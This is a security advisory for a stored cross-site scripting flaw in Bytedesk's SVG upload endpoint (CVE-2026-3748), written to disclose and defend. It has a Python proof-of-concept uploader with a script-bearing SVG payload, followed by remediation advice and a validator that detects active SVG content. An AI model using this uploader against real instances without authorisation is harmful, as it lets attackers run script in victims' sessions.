Bytedesk Unrestricted SVG File Upload Vulnerability Allowing Stored Cross-Site Scripting
Vulnerability
A vulnerability exists in Bytedesk versions through 1.3.9, allowing unrestricted upload of SVG files via the authenticated endpoint POST /api/v1/upload/file. The server's file type validation permits image/svg+xml, but fails to sanitize the contents before storage. This flaw enables an attacker to upload a malicious SVG containing JavaScript, which is executed when the file is accessed, resulting in stored cross-site scripting. The vulnerability has been assigned CVE-2026-3748.
Impact
An authenticated user can upload an SVG containing script; the server stores it unchanged and serves it back inline. A browser that loads the file URL as a document (by direct navigation, or through an iframe, object or embed element; an img tag renders the image without running its script) executes the embedded JavaScript in the origin the file is served from. When uploads are served from the application's own origin, the script runs with the victim's session, so the result is stored cross-site scripting against any user who can be lured to the file URL.
Reproduction
Authenticate and obtain a valid authorization token, then POST a multipart upload to /api/v1/upload/file whose file part is an SVG containing a script element (for example one that calls alert()). The server stores the file unmodified and returns its URL; opening that URL directly in a browser runs the embedded script. The script only executes when the SVG is loaded as a document (navigation, iframe, object or embed), not when it is referenced from an img tag.
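The upload request described above, as a Python proof-of-concept added here (it is not from the advisory or the Bytedesk project). The SVG payload is constructed for this example. Two details the advisory does not state are assumed: the token is sent as a Bearer token in the Authorization header, and the multipart field is named "file"; both are parameters so they can be changed. The base URL and token are supplied on the command line.

```python
"""PoC helper for the Bytedesk SVG upload (CVE-2026-3748)."""
import secrets
import urllib.request

# Constructed proof-of-concept SVG: a valid image that also carries a script.
# A browser that loads this file as a document (direct navigation, iframe,
# object or embed) runs the script; an <img> tag renders only the rectangle.
POC_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <rect width="100" height="100" fill="#36c"/>
  <script type="text/javascript">alert(document.domain)</script>
</svg>
"""


def build_multipart(field_name, filename, content_type, data, boundary=None):
    """Build a multipart/form-data body by hand (standard library only).

    Returns (body_bytes, value_for_the_Content-Type_header). A fixed boundary
    can be passed in for reproducible output; otherwise one is generated.
    """
    if boundary is None:
        boundary = "----PoCBoundary" + secrets.token_hex(8)
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field_name}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + data + tail, f"multipart/form-data; boundary={boundary}"


def upload_svg(base_url, token, svg=POC_SVG, field_name="file"):
    """POST the SVG to /api/v1/upload/file and return (status, response text).

    ASSUMPTIONS (not stated in the advisory): the token is sent as a Bearer
    token and the multipart field is named "file". The stored file's URL is
    somewhere in the response text; the advisory does not give its format.
    """
    body, ctype = build_multipart(field_name, "poc.svg", "image/svg+xml", svg)
    req = urllib.request.Request(
        base_url.rstrip("/") + "/api/v1/upload/file",
        data=body,
        method="POST",
        headers={"Authorization": f"Bearer {token}", "Content-Type": ctype},
    )
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    import sys

    if len(sys.argv) != 3:
        sys.exit("usage: poc.py https://bytedesk.example <token>")
    status, text = upload_svg(sys.argv[1], sys.argv[2])
    # Open the file URL contained in the reply directly in a browser to
    # observe the alert; embedding it via <img> will not trigger it.
    print(status)
    print(text)
```

Run it against a test instance only; the response is printed verbatim so the stored file URL can be picked out regardless of the reply format.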
Remediation
Upgrade to Bytedesk 1.4.5.1, which addresses this vulnerability; the release is available as a Docker image or as a downloadable zip file. Until the upgrade is applied, exposure can be reduced by rejecting SVG uploads, or by serving user uploads from a separate origin with a Content-Disposition: attachment header so browsers download the file instead of rendering it.
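As an added example (not Bytedesk's fix and not code from the advisory), the following Python function implements the kind of server-side check that the vulnerable endpoint lacked: it parses an uploaded SVG and rejects anything that carries active content. The function name, the thresholds and the sample inputs in the comments are this example's own choices.

```python
"""Server-side check that rejects SVG uploads carrying active content."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Elements that can run script or embed arbitrary HTML inside an SVG.
ACTIVE_ELEMENTS = {"script", "foreignObject", "handler"}
# Attributes that may hold a URL the browser will follow (plain and xlink:).
URL_ATTRS = {"href", f"{{{XLINK_NS}}}href"}
JS_SCHEME = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.I)
MAX_SIZE = 1 << 20  # 1 MiB; an arbitrary limit chosen for this example


def local_name(tag):
    """Strip the namespace from an ElementTree tag: '{ns}script' -> 'script'."""
    return tag.rsplit("}", 1)[-1]


def svg_active_content(data):
    """Return the reasons an SVG is unsafe to serve inline, or [] if none.

    DOCTYPE declarations are refused outright: that is where entity-expansion
    attacks (billion laughs, XXE) against the XML parser live.
    """
    if len(data) > MAX_SIZE:
        return ["file too large"]
    if re.search(rb"<!DOCTYPE", data, re.I):
        return ["DOCTYPE declaration"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if root.tag != f"{{{SVG_NS}}}svg":
        return [f"root element is not svg: {local_name(root.tag)}"]
    reasons = []
    for el in root.iter():
        name = local_name(el.tag)
        if name in ACTIVE_ELEMENTS:
            reasons.append(f"<{name}> element")
        for attr, value in el.attrib.items():
            aname = local_name(attr)
            if aname.lower().startswith("on"):  # onload, onclick, ...
                reasons.append(f"event handler {aname} on <{name}>")
            elif attr in URL_ATTRS and JS_SCHEME.match(value):
                reasons.append(f"{aname}={value!r} on <{name}>")
    return reasons


if __name__ == "__main__":
    # Constructed samples: a clean icon and the kind of payload the advisory
    # describes (a script element that calls alert()).
    clean = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="8" height="8"/></svg>'
    poc = (b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">'
           b'<script>alert(document.domain)</script></svg>')
    for sample in (clean, poc):
        print(svg_active_content(sample) or "ok")
```

Rejecting known-active constructs is the first half of the fix; no denylist or allowlist catches every vector (a use element can reference an external document, and CSS inside a style element can pull in url() resources), so files that pass should still be served from a separate origin, with Content-Disposition: attachment or a restrictive Content-Security-Policy, rather than inline from the application's origin. The check uses the standard library parser; for untrusted input in production, defusedxml gives stricter protection against parser-level attacks than the DOCTYPE rejection above.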
